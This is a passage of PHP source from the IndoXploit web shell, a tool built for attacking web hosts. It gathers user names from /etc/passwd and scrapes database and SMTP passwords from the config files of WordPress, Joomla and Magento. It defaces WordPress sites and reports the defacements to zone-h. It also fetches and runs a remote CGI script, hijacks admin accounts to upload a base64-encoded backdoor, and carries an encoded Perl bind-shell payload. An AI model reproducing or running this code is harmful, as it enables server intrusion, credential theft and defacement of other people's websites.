		<textarea style='width: 450px; height: 150px;' name='user_cp'>";
1157
		$_usercp = fopen("/etc/passwd","r");
1158
		while($getu = fgets($_usercp)) {
1159
			if($getu == '' || !$_usercp) {
1160
				echo "<font color=red>Can't read /etc/passwd</font>";
1161
			} else {
1162
				preg_match_all("/(.*?):x:/", $getu, $u);
1163
				foreach($u[1] as $user_cp) {
1164
						if(is_dir("/home/$user_cp/public_html")) {
1165
							echo "$user_cp\n";
1166
					}
1167
				}
1168
			}
1169
		}
1170
		echo "</textarea><br>
1171
		PASS: <br>
1172
		<textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1173
		function cp_pass($dir) {
1174
			$pass = "";
1175
			$dira = scandir($dir);
1176
			foreach($dira as $dirb) {
1177
				if(!is_file("$dir/$dirb")) continue;
1178
				$ambil = file_get_contents("$dir/$dirb");
1179
				if(preg_match("/WordPress/", $ambil)) {
1180
					$pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1181
				} elseif(preg_match("/JConfig|joomla/", $ambil)) {
1182
					$pass .= ambilkata($ambil,"password = '","'")."\n";
1183
				} elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1184
					$pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1185
				} elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1186
					$pass .= ambilkata($ambil,'password = "','"')."\n";
1187
				} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1188
					$pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1189
				} elseif(preg_match("/client/", $ambil)) {
1190
					preg_match("/password=(.*)/", $ambil, $pass1);
1191
					if(preg_match('/"/', $pass1[1])) {
1192
						$pass1[1] = str_replace('"', "", $pass1[1]);
1193
						$pass .= $pass1[1]."\n";
1194
					}
1195
				} elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1196
					$pass .= ambilkata($ambil,"db_password = '","'")."\n";
1197
				}
1198
			}
1199
			echo $pass;
1200
		}
1201
		$cp_pass = cp_pass($dir);
1202
		echo $cp_pass;
1203
		echo "</textarea><br>
1204
		<input type='submit' name='crack' style='width: 450px;' value='Hajar'>
1205
		</form>
1206
		<span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1207
	}
1208
} elseif($_GET['do'] == 'smtp') {
1209
	echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
1210
	function scj($dir) {
1211
		$dira = scandir($dir);
1212
		foreach($dira as $dirb) {
1213
			if(!is_file("$dir/$dirb")) continue;
1214
			$ambil = file_get_contents("$dir/$dirb");
1215
			$ambil = str_replace("$", "", $ambil);
1216
			if(preg_match("/JConfig|joomla/", $ambil)) {
1217
				$smtp_host = ambilkata($ambil,"smtphost = '","'");
1218
				$smtp_auth = ambilkata($ambil,"smtpauth = '","'");
1219
				$smtp_user = ambilkata($ambil,"smtpuser = '","'");
1220
				$smtp_pass = ambilkata($ambil,"smtppass = '","'");
1221
				$smtp_port = ambilkata($ambil,"smtpport = '","'");
1222
				$smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
1223
				echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
1224
				echo "SMTP port: <font color=lime>$smtp_port</font><br>";
1225
				echo "SMTP user: <font color=lime>$smtp_user</font><br>";
1226
				echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
1227
				echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
1228
				echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
1229
			}
1230
		}
1231
	}
1232
	$smpt_hunter = scj($dir);
1233
	echo $smpt_hunter;
1234
} elseif($_GET['do'] == 'auto_wp') {
1235
	if($_POST['hajar']) {
1236
		$title = htmlspecialchars($_POST['new_title']);
1237
		$pn_title = str_replace(" ", "-", $title);
1238
		if($_POST['cek_edit'] == "Y") {
1239
			$script = $_POST['edit_content'];
1240
		} else {
1241
			$script = $title;
1242
		}
1243
		$conf = $_POST['config_dir'];
1244
		$scan_conf = scandir($conf);
1245
		foreach($scan_conf as $file_conf) {
1246
			if(!is_file("$conf/$file_conf")) continue;
1247
			$config = file_get_contents("$conf/$file_conf");
1248
			if(preg_match("/WordPress/", $config)) {
1249
				$dbhost = ambilkata($config,"DB_HOST', '","'");
1250
				$dbuser = ambilkata($config,"DB_USER', '","'");
1251
				$dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1252
				$dbname = ambilkata($config,"DB_NAME', '","'");
1253
				$dbprefix = ambilkata($config,"table_prefix  = '","'");
1254
				$prefix = $dbprefix."posts";
1255
				$option = $dbprefix."options";
1256
				$conn = mysql_connect($dbhost,$dbuser,$dbpass);
1257
				$db = mysql_select_db($dbname);
1258
				$q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
1259
				$result = mysql_fetch_array($q);
1260
				$id = $result[ID];
1261
				$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1262
				$result2 = mysql_fetch_array($q2);
1263
				$target = $result2[option_value];
1264
				$update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
1265
				$update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
1266
				echo "<div style='margin: 5px auto;'>";
1267
				if($target == '') {
1268
					echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
1269
				} else {
1270
					echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
1271
				}
1272
				if(!$update OR !$conn OR !$db) {
1273
					echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
1274
				} else {
1275
					echo "<font color=lime>sukses di ganti.</font><br>";
1276
				}
1277
				echo "</div>";
1278
				mysql_close($conn);
1279
			}
1280
		}
1281
	} else {
1282
		echo "<center>
1283
		<h1>Auto Edit Title+Content WordPress</h1>
1284
		<form method='post'>
1285
		DIR Config: <br>
1286
		<input type='text' size='50' name='config_dir' value='$dir'><br><br>
1287
		Set Title: <br>
1288
		<input type='text' name='new_title' value='Hacked by IndoXploit' placeholder='New Title'><br><br>
1289
		Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
1290
		<span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
1291
		<textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
1292
		<input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
1293
		</form>
1294
		<span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
1295
		";
1296
	}
1297
} elseif($_GET['do'] == 'zoneh') {
1298
	if($_POST['submit']) {
1299
		$domain = explode("\r\n", $_POST['url']);
1300
		$nick =  $_POST['nick'];
1301
		echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
1302
		echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
1303
		function zoneh($url,$nick) {
1304
			$ch = curl_init("http://www.zone-h.com/notify/single");
1305
				  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1306
				  curl_setopt($ch, CURLOPT_POST, true);
1307
				  curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
1308
			return curl_exec($ch);
1309
				  curl_close($ch);
1310
		}
1311
		foreach($domain as $url) {
1312
			$zoneh = zoneh($url,$nick);
1313
			if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
1314
				echo "$url -> <font color=lime>OK</font><br>";
1315
			} else {
1316
				echo "$url -> <font color=red>ERROR</font><br>";
1317
			}
1318
		}
1319
	} else {
1320
		echo "<center><form method='post'>
1321
		<u>Defacer</u>: <br>
1322
		<input type='text' name='nick' size='50' value='IndoXploit'><br>
1323
		<u>Domains</u>: <br>
1324
		<textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
1325
		<input type='submit' name='submit' value='Submit' style='width: 450px;'>
1326
		</form>";
1327
	}
1328
	echo "</center>";
1329
} elseif($_GET['do'] == 'cgi') {
1330
	$cgi_dir = mkdir('idx_cgi', 0755);
1331
	$file_cgi = "idx_cgi/cgi.izo";
1332
	$isi_htcgi = "AddHandler cgi-script .izo";
1333
	$htcgi = fopen(".htaccess", "w");
1334
	fwrite($htcgi, $isi_htcgi);
1335
	fclose($htcgi);
1336
	$cgi_script = getsource("http://pastebin.com/raw/Lj46KxFT");
1337
	$cgi = fopen($file_cgi, "w");
1338
	fwrite($cgi, $cgi_script);
1339
	fclose($cgi);
1340
	chmod($file_cgi, 0755);
1341
	echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
1342
} elseif($_GET['do'] == 'fake_root') {
1343
	ob_start();
1344
	$cwd = getcwd();
1345
	$ambil_user = explode("/", $cwd);
1346
	$user = $ambil_user[2];
1347
	if($_POST['reverse']) {
1348
		$site = explode("\r\n", $_POST['url']);
1349
		$file = $_POST['file'];
1350
		foreach($site as $url) {
1351
			$cek = getsource("$url/~$user/$file");
1352
			if(preg_match("/hacked/i", $cek)) {
1353
				echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
1354
			}
1355
		}
1356
	} else {
1357
		echo "<center><form method='post'>
1358
		Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
1359
		User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
1360
		Domain: <br>
1361
		<textarea style='width: 450px; height: 250px;' name='url'>";
1362
		reverse($_SERVER['HTTP_HOST']);
1363
		echo "</textarea><br>
1364
		<input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
1365
		</form><br>
1366
		NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
1367
	}
1368
} elseif($_GET['do'] == 'adminer') {
1369
	$full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
1370
	function adminer($url, $isi) {
1371
		$fp = fopen($isi, "w");
1372
		$ch = curl_init();
1373
		 	  curl_setopt($ch, CURLOPT_URL, $url);
1374
		 	  curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
1375
		 	  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1376
		 	  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
1377
		   	  curl_setopt($ch, CURLOPT_FILE, $fp);
1378
		return curl_exec($ch);
1379
		   	  curl_close($ch);
1380
		fclose($fp);
1381
		ob_flush();
1382
		flush();
1383
	}
1384
	if(file_exists('adminer.php')) {
1385
		echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
1386
	} else {
1387
		if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
1388
			echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
1389
		} else {
1390
			echo "<center><font color=red>gagal buat file adminer</font></center>";
1391
		}
1392
	}
1393
} elseif($_GET['do'] == 'auto_dwp') {
1394
	if($_POST['auto_deface_wp']) {
1395
		function anucurl($sites) {
1396
    		$ch = curl_init($sites);
1397
	       		  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1398
	       		  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1399
	       		  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1400
	       		  curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1401
	       		  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1402
	       		  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1403
	       		  curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1404
	       		  curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1405
	       		  curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1406
			$data = curl_exec($ch);
1407
				  curl_close($ch);
1408
			return $data;
1409
		}
1410
		function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1411
    		$post = array(
1412
                   "log" => "$userr",
1413
                   "pwd" => "$pass",
1414
                   "rememberme" => "forever",
1415
                   "wp-submit" => "$wp_submit",
1416
                   "redirect_to" => "$web",
1417
                   "testcookie" => "1",
1418
                   );
1419
			$ch = curl_init($cek);
1420
				  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1421
				  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1422
				  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1423
				  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1424
				  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1425
				  curl_setopt($ch, CURLOPT_POST, 1);
1426
				  curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1427
				  curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1428
				  curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1429
				  curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1430
			$data = curl_exec($ch);
1431
				  curl_close($ch);
1432
			return $data;
1433
		}
1434
		$scan = $_POST['link_config'];
1435
		$link_config = scandir($scan);
1436
		$script = htmlspecialchars($_POST['script']);
1437
		$user = "indoxploit";
1438
		$pass = "indoxploit";
1439
		$passx = md5($pass);
1440
		foreach($link_config as $dir_config) {
1441
			if(!is_file("$scan/$dir_config")) continue;
1442
			$config = file_get_contents("$scan/$dir_config");
1443
			if(preg_match("/WordPress/", $config)) {
1444
				$dbhost = ambilkata($config,"DB_HOST', '","'");
1445
				$dbuser = ambilkata($config,"DB_USER', '","'");
1446
				$dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1447
				$dbname = ambilkata($config,"DB_NAME', '","'");
1448
				$dbprefix = ambilkata($config,"table_prefix  = '","'");
1449
				$prefix = $dbprefix."users";
1450
				$option = $dbprefix."options";
1451
				$conn = mysql_connect($dbhost,$dbuser,$dbpass);
1452
				$db = mysql_select_db($dbname);
1453
				$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1454
				$result = mysql_fetch_array($q);
1455
				$id = $result[ID];
1456
				$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1457
				$result2 = mysql_fetch_array($q2);
1458
				$target = $result2[option_value];
1459
				if($target == '') {					
1460
					echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
1461
				} else {
1462
					echo "[+] $target <br>";
1463
				}
1464
				$update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1465
				if(!$conn OR !$db OR !$update) {
1466
					echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1467
					mysql_close($conn);
1468
				} else {
1469
					$site = "$target/wp-login.php";
1470
					$site2 = "$target/wp-admin/theme-install.php?upload";
1471
					$b1 = anucurl($site2);
1472
					$wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
1473
					$b = lohgin($site, $site2, $user, $pass, $wp_sub);
1474
					$anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
1475
					$upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
1476
					$www = "m.php";
1477
					$fp5 = fopen($www,"w");
1478
					fputs($fp5,$upload3);
1479
					$post2 = array(
1480
							"_wpnonce" => "$anu2",
1481
							"_wp_http_referer" => "/wp-admin/theme-install.php?upload",
1482
							"themezip" => "@$www",
1483
							"install-theme-submit" => "Install Now",
1484
							);
1485
					$ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
1486
						  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1487
						  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1488
						  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1489
						  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1490
						  curl_setopt($ch, CURLOPT_POST, 1);
1491
						  curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
1492
						  curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1493
						  curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1494
					      curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1495
					$data3 = curl_exec($ch);
1496
						  curl_close($ch);
1497
					$y = date("Y");
1498
					$m = date("m");
1499
					$namafile = "id.php";
1500
					$fpi = fopen($namafile,"w");
1501
					fputs($fpi,$script);
1502
					$ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
1503
						   curl_setopt($ch6, CURLOPT_POST, true);
1504
						   curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
1505
						   curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
1506
						   curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
1507
	       		  		   curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
1508
	       		  		   curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
1509
					$postResult = curl_exec($ch6);
1510
						   curl_close($ch6);
1511
					$as = "$target/k.php";
1512
					$bs = anucurl($as);
1513
					if(preg_match("#$script#is", $bs)) {
1514
            	       	echo "[+] <font color='lime'>berhasil mepes...</font><br>";
1515
            	       	echo "[+] <a href='$as' target='_blank'>$as</a><br><br>"; 
1516
            	        } else {
1517
            	        echo "[-] <font color='red'>gagal mepes...</font><br>";
1518
            	        echo "[!!] coba aja manual: <br>";
1519
            	        echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1520
            	        echo "[+] username: <font color=lime>$user</font><br>";
1521
            	        echo "[+] password: <font color=lime>$pass</font><br><br>";     
1522
            	        }
1523
            		mysql_close($conn);
1524
				}
1525
			}
1526
		}
1527
	} else {
1528
		echo "<center><h1>WordPress Auto Deface</h1>
1529
		<form method='post'>
1530
		<input type='text' name='link_config' size='50' height='10' value='$dir'><br>
1531
		<input type='text' name='script' height='10' size='50' placeholder='Hacked by IndoXploit' required><br>
1532
		<input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
1533
		</form>
1534
		<br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
1535
		</center>";
1536
	}
1537
} elseif($_GET['do'] == 'auto_dwp2') {
1538
	if($_POST['auto_deface_wp']) {
1539
		function anucurl($sites) {
1540
    		$ch = curl_init($sites);
1541
	       		  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1542
	       		  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1543
	       		  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1544
	       		  curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1545
	       		  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1546
	       		  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1547
	       		  curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1548
	       		  curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1549
	       		  curl_setopt($ch, CURLOPT_COOKIESESSION,true);
1550
			$data = curl_exec($ch);
1551
				  curl_close($ch);
1552
			return $data;
1553
		}
1554
		function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1555
    		$post = array(
1556
                   "log" => "$userr",
1557
                   "pwd" => "$pass",
1558
                   "rememberme" => "forever",
1559
                   "wp-submit" => "$wp_submit",
1560
                   "redirect_to" => "$web",
1561
                   "testcookie" => "1",
1562
                   );
1563
			$ch = curl_init($cek);
1564
				  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1565
				  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1566
				  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1567
				  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1568
				  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1569
				  curl_setopt($ch, CURLOPT_POST, 1);
1570
				  curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1571
				  curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1572
				  curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1573
				  curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1574
			$data = curl_exec($ch);
1575
				  curl_close($ch);
1576
			return $data;
1577
		}
1578
		$link = explode("\r\n", $_POST['link']);
1579
		$script = htmlspecialchars($_POST['script']);
1580
		$user = "indoxploit";
1581
		$pass = "indoxploit";
1582
		$passx = md5($pass);
1583
		foreach($link as $dir_config) {
1584
			$config = anucurl($dir_config);
1585
			$dbhost = ambilkata($config,"DB_HOST', '","'");
1586
			$dbuser = ambilkata($config,"DB_USER', '","'");
1587
			$dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1588
			$dbname = ambilkata($config,"DB_NAME', '","'");
1589
			$dbprefix = ambilkata($config,"table_prefix  = '","'");
1590
			$prefix = $dbprefix."users";
1591
			$option = $dbprefix."options";
1592
			$conn = mysql_connect($dbhost,$dbuser,$dbpass);
1593
			$db = mysql_select_db($dbname);
1594
			$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1595
			$result = mysql_fetch_array($q);
1596
			$id = $result[ID];
1597
			$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1598
			$result2 = mysql_fetch_array($q2);
1599
			$target = $result2[option_value];
1600
			if($target == '') {					
1601
				echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
1602
			} else {
1603
				echo "[+] $target <br>";
1604
			}
1605
			$update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1606
			if(!$conn OR !$db OR !$update) {
1607
				echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1608
				mysql_close($conn);
1609
			} else {
1610
				$site = "$target/wp-login.php";
1611
				$site2 = "$target/wp-admin/theme-install.php?upload";
1612
				$b1 = anucurl($site2);
1613
				$wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
1614
				$b = lohgin($site, $site2, $user, $pass, $wp_sub);
1615
				$anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
1616
				$upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
1617
				$www = "m.php";
1618
				$fp5 = fopen($www,"w");
1619
				fputs($fp5,$upload3);
1620
				$post2 = array(
1621
						"_wpnonce" => "$anu2",
1622
						"_wp_http_referer" => "/wp-admin/theme-install.php?upload",
1623
						"themezip" => "@$www",
1624
						"install-theme-submit" => "Install Now",
1625
						);
1626
				$ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
1627
					  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1628
					  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1629
					  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1630
					  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1631
					  curl_setopt($ch, CURLOPT_POST, 1);
1632
					  curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
1633
					  curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1634
					  curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1635
				      curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1636
				$data3 = curl_exec($ch);
1637
					  curl_close($ch);
1638
				$y = date("Y");
1639
				$m = date("m");
1640
				$namafile = "id.php";
1641
				$fpi = fopen($namafile,"w");
1642
				fputs($fpi,$script);
1643
				$ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
1644
					   curl_setopt($ch6, CURLOPT_POST, true);
1645
					   curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
1646
					   curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
1647
					   curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
1648
	       		  	   curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
1649
	       		 	   curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
1650
				$postResult = curl_exec($ch6);
1651
					   curl_close($ch6);
1652
				$as = "$target/k.php";
1653
				$bs = anucurl($as);
1654
				if(preg_match("#$script#is", $bs)) {
1655
                   	echo "[+] <font color='lime'>berhasil mepes...</font><br>";
1656
                   	echo "[+] <a href='$as' target='_blank'>$as</a><br><br>"; 
1657
                    } else {
1658
                    echo "[-] <font color='red'>gagal mepes...</font><br>";
1659
                    echo "[!!] coba aja manual: <br>";
1660
                    echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1661
                    echo "[+] username: <font color=lime>$user</font><br>";
1662
                    echo "[+] password: <font color=lime>$pass</font><br><br>";     
1663
                    }
1664
            	mysql_close($conn);
1665
			}
1666
		}
1667
	} else {
1668
		echo "<center><h1>WordPress Auto Deface V.2</h1>
1669
		<form method='post'>
1670
		Link Config: <br>
1671
		<textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
1672
		<input type='text' name='script' height='10' size='50' placeholder='Hacked by IndoXploit' required><br>
1673
		<input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
1674
		</form></center>";
1675
	}
1676
} elseif($_GET['do'] == 'network') {
1677
	echo "<form method='post'>
1678
	<u>Bind Port:</u> <br>
1679
	PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
1680
	<input type='submit' name='sub_bp' value='>>'>
1681
	</form>
1682
	<form method='post'>
1683
	<u>Back Connect:</u> <br>
1684
	Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
1685
	PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
1686
	<input type='submit' name='sub_bc' value='>>'>
1687
	</form>";
1688
	$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1689
	if(isset($_POST['sub_bp'])) {
1690
		$f_bp = fopen("/tmp/bp.pl", "w");
1691
		fwrite($f_bp, base64_decode($bind_port_p));
1692
		fclose($f_bp);
1693
1694
